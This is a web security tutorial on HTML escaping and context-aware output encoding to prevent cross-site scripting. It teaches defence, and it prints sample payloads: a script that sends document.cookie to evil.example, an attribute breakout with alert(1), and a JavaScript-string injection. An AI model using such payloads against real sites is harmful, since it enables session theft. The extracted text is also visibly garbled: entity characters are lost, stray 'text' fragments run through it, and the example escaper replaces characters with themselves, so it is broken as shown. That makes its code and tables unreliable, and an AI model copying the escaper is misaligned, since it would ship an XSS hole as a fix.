Most rendering bugs and a large share of web security holes come down to one question: was this text treated as data, or as markup? HTML escaping is how you answer that question consistently, and getting it right is the difference between a clean page and a cross-site scripting (XSS) hole.
What an HTML entity actually is
An HTML entity is a way to represent a character using a sequence of plain ASCII text so the browser doesn't interpret it as part of the markup language. Entities come in two forms:
- Named entities like ,text
<,text>, andtext&. Each maps to a specific character.text" - Numeric character references like (decimal) ortext
<(hexadecimal), both of which producetext<.text<
When the browser's parser encounters
<The characters that matter
The browser decides what is markup and what is text using a small set of special characters. These are the ones you must be able to neutralize:
| Character | Why it's dangerous | Entity |
|---|---|---|
text < | Opens a tag | text < |
text > | Closes a tag | text > |
text & | Starts an entity reference | text & |
text " | Terminates a double-quoted attribute | text " |
text ' | Terminates a single-quoted attribute | text 'text ' |
The ampersand is the one people forget. If you escape
<<&Tom & Jerry <b>&Why you escape: the two failure modes
There are two distinct reasons to escape, and conflating them leads to sloppy fixes.
Broken markup
If a user types a product review that says
I rate this 3 < 5 stars< 5 stars>Cross-site scripting (XSS)
Now imagine the user types this instead:
html<script>fetch('https://evil.example/steal?c='+document.cookie)</script>
If that lands unescaped in your page, the browser executes it. The attacker's JavaScript now runs in your origin, with access to your users' session cookies, local storage, and the full DOM. Escaping
<<XSS is not exotic. It is almost always plain text that wasn't escaped before being concatenated into HTML.
Context-aware escaping
The single most important idea in this article: escaping depends on where the data lands. "HTML-escape everything" is a good default but an incomplete rule, because HTML has several sub-languages, each with its own special characters.
HTML text content
Between tags, like
<p>HERE</p><>&html<p>3 < 5 & rising</p>
HTML attributes
Inside an attribute you also have to escape the quote character that delimits the attribute, or the value can break out:
html<!-- Dangerous: value breaks out of the quotes --> <input value=""><script>alert(1)</script>"> <!-- Safe: quote is escaped --> <input value=""><script>alert(1)</script>">
Always quote your attributes. An unquoted attribute can be ended by a space, making it far harder to escape safely.
JavaScript and CSS contexts
HTML entities do not work inside a
<script>style<html<script> // HTML-escaping here does nothing useful and can break the JS var name = "USER_INPUT"; </script>
If
USER_INPUT";attackerCode();//<JSON.stringifyURLs
A value placed in an
hrefsrcjavascript:alert(1)httphttpsmailtoThe takeaway: pick the escaping function that matches the destination context. The same byte of user input may need three different treatments depending on whether it lands in text, an attribute, a script string, or a URL.
Named vs numeric entities
For the security-critical characters, named and numeric entities are interchangeable in effect:
- andtext
<andtext<all rendertext<.text< - andtext
&both rendertext&.text&
Practical guidance:
- Named entities are more readable for the common set (,text
<,text>,text&). Prefer them in hand-written markup.text" - Numeric references are universal. Any Unicode code point can be written as ortext
&#NNNN;, which matters for characters that have no named entity.text&#xHHHH; - is risky in old contexts. It is valid in HTML5 but was not defined in HTML 4 and historically failed in some XML/email rendering paths. When escaping single quotes defensively,text
'is the safer choice.text'
A defensive escaper that emits numeric references for the dangerous set is a perfectly reasonable design, and it sidesteps the
'If you want to inspect exactly what a given snippet decodes to, or convert a block of text to its escaped form, our HTML entity encoder and decoder does the round-trip and runs entirely in your browser, so nothing you paste leaves your device.
Common mistakes
Escaping on input instead of output
A recurring anti-pattern is to escape data the moment it arrives and store the escaped version in the database. This breaks the moment the same data is used in a non-HTML context: an email, a JSON API, a CSV export, or a PDF. You end up with
&Double escaping
If you escape a value twice,
&&&amp;&Trusting an allowlist of "safe" characters
Blocklisting
<script><img src=x onerror=...>JaVaScRiPt:Forgetting the attribute quote
Escaping
<>Marking strings as "safe" to silence the framework
Every templating system has an escape hatch (
dangerouslySetInnerHTML|safev-htmlmark_safeA minimal correct escaper
For HTML text and double-quoted attribute contexts, this small function covers the dangerous set in the correct order:
javascriptfunction escapeHtml(s) { return String(s) .replace(/&/g, '&') // must be first .replace(/</g, '<') .replace(/>/g, '>') .replace(/"/g, '"') .replace(/'/g, '''); }
This is deliberately small. It is correct for text and attribute output, and it is not a substitute for JSON encoding in script contexts or URL encoding in
hrefLayers beyond escaping
Escaping is the primary defense, but pair it with a couple of cheap reinforcements:
- A Content-Security-Policy that disallows inline scripts turns many would-be XSS payloads into nothing, even if an escape slips.
- HttpOnly cookies keep session tokens out of reach of any script that does execute.
Neither replaces escaping; both reduce the blast radius when something gets through.
Seeing it in practice
The fastest way to build intuition is to watch escaped and unescaped markup render side by side. Paste a snippet with raw
<&